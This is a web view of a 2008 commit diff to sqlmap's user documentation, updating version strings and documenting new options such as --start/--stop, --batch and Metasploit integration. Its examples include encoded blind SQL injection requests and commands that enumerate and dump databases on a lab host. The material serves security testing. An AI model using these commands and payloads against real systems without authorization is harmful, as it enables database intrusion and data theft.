PenTest/sqlmap
1
0
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-12-15 20:29:04 +00:00
Code Issues Projects Releases Wiki Activity

Updated site, documentation (dev and user) and packaging scripts for 0.6.1

Browse Source
This commit is contained in:
Bernardo Damele
2008-10-20 13:43:18 +00:00
parent 6ddb5afef9
commit fcc16b2346
6 changed files with 292 additions and 102 deletions
Download Patch File Download Diff File Expand all files Collapse all files

188
doc/README.html
View File

@@ -245,8 +245,8 @@ those that vary the HTTP response page content.
On the dynamic ones sqlmap automatically tests and detects the ones
affected by SQL injection. Each dynamic parameter is tested for
<EM>numeric</EM>, <EM>single quoted string</EM>, <EM>double quoted
string</EM> and all of these three datatypes with zero, one and two
parenthesis to correctly detect which is the <CODE>SELECT</CODE> statement syntax to
string</EM> and all of these three datatypes with zero to two parenthesis
to correctly detect which is the <CODE>SELECT</CODE> statement syntax to
perform further injections with. It is also possible to specify the
parameter(s) that you want to perform tests and use for injection on.</LI>
<LI>Option to specify the <B>maximum number of concurrent HTTP
@@ -277,6 +277,9 @@ and <B>resume the injection from this file in a second time</B>.</LI>
<LI>Support to read options from a configuration INI file rather than
specify each time all of the options on the command line. Support also to
save command line options on a configuration INI file.</LI>
<LI>Integration with other IT security related open source projects,
<A HREF="http://metasploit.com/framework/">Metasploit</A> and
<A HREF="http://w3af.sourceforge.net/">w3af</A>.</LI>
<LI><B>PHP setting <CODE>magic_quotes_gpc</CODE> bypass</B> by encoding
every query string, between single quotes, with <CODE>CHAR</CODE>, or similar,
database management system function.</LI>
@@ -292,19 +295,19 @@ It is available in various formats:</P>
<P>
<UL>
<LI>
<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1.1.tar.gz">Source gzip compressed</A> operating system independent.</LI>
<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1.tar.gz">Source gzip compressed</A> operating system independent.</LI>
<LI>
<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1.1.tar.bz2">Source bzip2 compressed</A> operating system independent.</LI>
<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1.tar.bz2">Source bzip2 compressed</A> operating system independent.</LI>
<LI>
<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1.1.zip">Source zip compressed</A> operating system independent.</LI>
<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1.zip">Source zip compressed</A> operating system independent.</LI>
<LI>
<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap_0.6.1.1-1_all.deb">DEB binary package</A> architecture independent for Debian and any
<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap_0.6.1-1_all.deb">DEB binary package</A> architecture independent for Debian and any
other Debian derivated GNU/Linux distribution.</LI>
<LI>
<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1.1-1.noarch.rpm">RPM binary package</A> architecture independent for Fedora and any
<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1-1.noarch.rpm">RPM binary package</A> architecture independent for Fedora and any
other operating system that can install RPM packages.</LI>
<LI>
<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1.1_exe.zip">Portable executable for Windows</A> that <B>does not require the Python
<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1_exe.zip">Portable executable for Windows</A> that <B>does not require the Python
interpreter</B> to be installed on the operating system.</LI>
</UL>
</P>
@@ -331,7 +334,7 @@ and
<PRE>
$ python sqlmap.py -h
sqlmap/0.6.1.1 coded by Bernardo Damele A. G. &lt;bernardo.damele@gmail.com>
sqlmap/0.6.1 coded by Bernardo Damele A. G. &lt;bernardo.damele@gmail.com>
and Daniele Bellucci &lt;daniele.bellucci@gmail.com>
Usage: sqlmap.py [options] {-u &lt;URL> | -g &lt;google dork> | -c &lt;config file>}
@@ -379,13 +382,16 @@ Options:
--dbs Enumerate DBMS databases
--tables Enumerate DBMS database tables (opt: -D)
--columns Enumerate DBMS database table columns (req: -T, -D)
--dump Dump DBMS database table entries (req: -T, -D opt: -C)
--dump Dump DBMS database table entries (req: -T, -D opt: -C,
--start, --stop)
--dump-all Dump all DBMS databases tables entries
-D DB DBMS database to enumerate
-T TBL DBMS database table to enumerate
-C COL DBMS database table column to enumerate
-U USER DBMS user to enumerate
--exclude-sysdbs Exclude DBMS system databases when enumerating tables
--start=LIMITSTART First table entry to dump
--stop=LIMITSTOP Last table entry to dump
--sql-query=QUERY SQL SELECT query to be executed
--sql-shell Prompt for an interactive SQL shell
@@ -417,6 +423,7 @@ Options:
-s SESSIONFILE Save and resume all data retrieved on a session file
-c CONFIGFILE Load options from a configuration INI file
--save Save options on a configuration INI file
--batch Never ask for user input, use the default behaviour
</PRE>
</CODE></BLOCKQUOTE>
</P>
@@ -528,7 +535,7 @@ $ python sqlmap.py -u http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;cat
[hh:mm:28] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_int.php?id=1&amp;cat=2 HTTP/1.1
Host: 192.168.1.121:80
User-agent: sqlmap/0.6.1.1 (http://sqlmap.sourceforge.net)
User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net)
Connection: close
[...]
[hh:mm:29] [INFO] testing MySQL
@@ -537,7 +544,7 @@ Connection: close
GET /sqlmap/mysql/get_int.php?id=1%20AND%20ORD%28MID%28%28CONCAT%28CHAR%2852%29%2C%20
CHAR%2852%29%29%29%2C%201%2C%201%29%29%20%3E%2063%20AND%207994=7994&amp;cat=2 HTTP/1.1
Host: 192.168.1.121:80
User-agent: sqlmap/0.6.1.1 (http://sqlmap.sourceforge.net)
User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net)
Connection: close
[...]
</PRE>
@@ -555,7 +562,7 @@ $ python sqlmap.py -u http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;cat
[hh:mm:32] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_int.php?id=1&amp;cat=2 HTTP/1.1
Host: 192.168.1.121:80
User-agent: sqlmap/0.6.1.1 (http://sqlmap.sourceforge.net)
User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net)
Connection: close
[hh:mm:32] [TRAFFIC IN] HTTP response (OK - 200):
@@ -573,7 +580,7 @@ Content-Type: text/html
GET /sqlmap/mysql/get_int.php?id=1%20AND%20ORD%28MID%28%28CONCAT%28CHAR%2852%29%2C%20
CHAR%2852%29%29%29%2C%201%2C%201%29%29%20%3E%2063%20AND%204435=4435&amp;cat=2 HTTP/1.1
Host: 192.168.1.121:80
User-agent: sqlmap/0.6.1.1 (http://sqlmap.sourceforge.net)
User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net)
Connection: close
[hh:mm:33] [TRAFFIC IN] HTTP response (OK - 200):
@@ -600,7 +607,7 @@ $ python sqlmap.py -u http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;cat
[hh:mm:23] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_int.php?id=1&amp;cat=2 HTTP/1.1
Host: 192.168.1.121:80
User-agent: sqlmap/0.6.1.1 (http://sqlmap.sourceforge.net)
User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net)
Connection: close
[hh:mm:23] [TRAFFIC IN] HTTP response (OK - 200):
@@ -2042,7 +2049,8 @@ is connected to, which is always <CODE>public</CODE>.</P>
<H3>Dump database tables entries</H3>
<P>Options: <CODE>--dump</CODE>, <CODE>-C</CODE>, <CODE>-T</CODE> and <CODE>-D</CODE></P>
<P>Options: <CODE>--dump</CODE>, <CODE>-C</CODE>, <CODE>-T</CODE>, <CODE>-D</CODE>,
<CODE>--start</CODE> and <CODE>--stop</CODE></P>
<P>It is possible to dump the entries for a specific database table.
This functionality depends on both <CODE>-T</CODE> to specify the table name
@@ -2058,15 +2066,15 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;ca
Database: test
Table: users
[5 entries]
+----+--------------------------------------------+-------------------+
| id | name | surname |
+----+--------------------------------------------+-------------------+
| 1 | luther | blissett |
| 2 | fluffy | bunny |
| 3 | wu | ming |
+----+----------------------------------------------+-------------------+
| id | name | surname |
+----+----------------------------------------------+-------------------+
| 1 | luther | blissett |
| 2 | fluffy | bunny |
| 3 | wu | ming |
| 4 | sqlmap/0.6.1 (http://sqlmap.sourceforge.net) | user agent header |
| 5 | NULL | nameisnull |
+----+--------------------------------------------+-------------------+
| 5 | NULL | nameisnull |
+----+----------------------------------------------+-------------------+
</PRE>
</CODE></BLOCKQUOTE>
</P>
@@ -2112,15 +2120,15 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&amp;ca
Database: public
Table: users
[5 entries]
+----+--------------------------------------------+-------------------+
| id | name | surname |
+----+--------------------------------------------+-------------------+
| 1 | luther | blissett |
| 2 | fluffy | bunny |
| 3 | wu | ming |
+----+----------------------------------------------+-------------------+
| id | name | surname |
+----+----------------------------------------------+-------------------+
| 1 | luther | blissett |
| 2 | fluffy | bunny |
| 3 | wu | ming |
| 4 | sqlmap/0.6.1 (http://sqlmap.sourceforge.net) | user agent header |
| 5 | | nameisnull |
+----+--------------------------------------------+-------------------+
| 5 | | nameisnull |
+----+----------------------------------------------+-------------------+
[hh:mm:59] [INFO] Table 'public.users' dumped to CSV file '/software/sqlmap/output/
192.168.1.121/dump/public/users.csv'
@@ -2138,6 +2146,40 @@ $ cat /software/sqlmap/output/192.168.1.121/dump/public/users.csv
</CODE></BLOCKQUOTE>
</P>
<P>You can also provide the <CODE>--start</CODE> and/or the <CODE>--stop</CODE> option
to limit the dump to a range of entries.</P>
<P>
<UL>
<LI><CODE>--start</CODE> specifies the first entry to enumerate</LI>
<LI><CODE>--stop</CODE> specifies the last entry to enumerate</LI>
</UL>
</P>
<P>Example on a <B>MySQL 5.0.51</B> target:</P>
<P>
<BLOCKQUOTE><CODE>
<PRE>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;cat=2" --dump \
-T users -D test --start 2 --stop 4
Database: test
Table: users
[3 entries]
+----+----------------------------------------------+-------------------+
| id | name | surname |
+----+----------------------------------------------+-------------------+
| 2 | fluffy | bunny |
| 3 | wu | ming |
| 4 | sqlmap/0.6.1 (http://sqlmap.sourceforge.net) | user agent header |
+----+----------------------------------------------+-------------------+
</PRE>
</CODE></BLOCKQUOTE>
</P>
<P>As you can see, sqlmap is very flexible: you can leave it automatically
enumerate the whole database table up to a single column of a specific
table entry.</P>
<H3>Dump all databases tables entries</H3>
@@ -2153,15 +2195,15 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;ca
Database: test
Table: users
[5 entries]
+----+--------------------------------------------+-------------------+
| id | name | surname |
+----+--------------------------------------------+-------------------+
| 1 | luther | blissett |
| 2 | fluffy | bunny |
| 3 | wu | ming |
+----+----------------------------------------------+-------------------+
| id | name | surname |
+----+----------------------------------------------+-------------------+
| 1 | luther | blissett |
| 2 | fluffy | bunny |
| 3 | wu | ming |
| 4 | sqlmap/0.6.1 (http://sqlmap.sourceforge.net) | user agent header |
| 5 | NULL | nameisnull |
+----+--------------------------------------------+-------------------+
| 5 | NULL | nameisnull |
+----+----------------------------------------------+-------------------+
Database: information_schema
Table: CHARACTER_SETS
@@ -2246,15 +2288,15 @@ Table: spt_datatype_info_ext
Database: master
Table: users
[5 entries]
+----+--------------------------------------------+-------------------+
| id | name | surname |
+----+--------------------------------------------+-------------------+
+----+----------------------------------------------+-------------------+
| id | name | surname |
+----+----------------------------------------------+-------------------+
| 4 | sqlmap/0.6.1 (http://sqlmap.sourceforge.net) | user agent header |
| 2 | fluffy | bunny |
| 1 | luther | blisset |
| 3 | wu | ming |
| 5 | NULL | nameisnull |
+----+--------------------------------------------+-------------------+
| 2 | fluffy | bunny |
| 1 | luther | blisset |
| 3 | wu | ming |
| 5 | NULL | nameisnull |
+----+----------------------------------------------+-------------------+
[...]
</PRE>
@@ -3123,7 +3165,8 @@ back-end DBMS: MySQL >= 5.0.0
<P>Option: <CODE>--save</CODE></P>
<P>It is possible to save the command line options to a configuration INI
file.</P>
<P>Example on a <B>PostgreSQL 8.2.7</B> target:</P>
<P>
@@ -3231,6 +3274,53 @@ banner: 'PostgreSQL 8.2.7 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.
</P>
<H3>Act in non-interactive mode</H3>
<P>Option: <CODE>--batch</CODE></P>
<P>If you want sqlmap to run as a batch tool, without interacting with you in
case of a choice has to be done, you can force it by using <CODE>--batch</CODE>
option than letting sqlmap go for a default behaviour.</P>
<P>Example on a <B>MySQL 5.0.51</B> target:</P>
<P>
<BLOCKQUOTE><CODE>
<PRE>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_str.php?id=1&amp;name=luther" -v 1 \
--batch
[hh:mm:22] [INFO] testing if GET parameter 'id' is dynamic
[hh:mm:22] [INFO] confirming that GET parameter 'id' is dynamic
[hh:mm:22] [INFO] GET parameter 'id' is dynamic
[hh:mm:22] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis
[hh:mm:22] [INFO] testing unescaped numeric injection on GET parameter 'id'
[hh:mm:22] [INFO] confirming unescaped numeric injection on GET parameter 'id'
[hh:mm:22] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis
[hh:mm:22] [INFO] testing if GET parameter 'name' is dynamic
[hh:mm:22] [INFO] confirming that GET parameter 'name' is dynamic
[hh:mm:22] [INFO] GET parameter 'name' is dynamic
[hh:mm:22] [INFO] testing sql injection on GET parameter 'name' with 0 parenthesis
[hh:mm:22] [INFO] testing unescaped numeric injection on GET parameter 'name'
[hh:mm:22] [INFO] GET parameter 'name' is not unescaped numeric injectable
[hh:mm:22] [INFO] testing single quoted string injection on GET parameter 'name'
[hh:mm:22] [INFO] confirming single quoted string injection on GET parameter 'name'
[hh:mm:22] [INFO] GET parameter 'name' is single quoted string injectable with 0 parenthesis
[hh:mm:22] [INFO] there were multiple injection points, please select the one to use to go ahead:
[0] place: GET, parameter: id, type: numeric (default)
[1] place: GET, parameter: name, type: stringsingle
[q] Quit
Choice: 0
[hh:mm:22] [DEBUG] used the default behaviour, running in batch mode
[...]
back-end DBMS: MySQL >= 5.0.0
</PRE>
</CODE></BLOCKQUOTE>
</P>
<P>As you can see, sqlmap choosed automatically to injection on the first
vulnerable parameter which is the default behaviour.</P>
<H2><A NAME="s6">6.</A> <A HREF="#toc6">Disclaimer</A></H2>
<P>sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY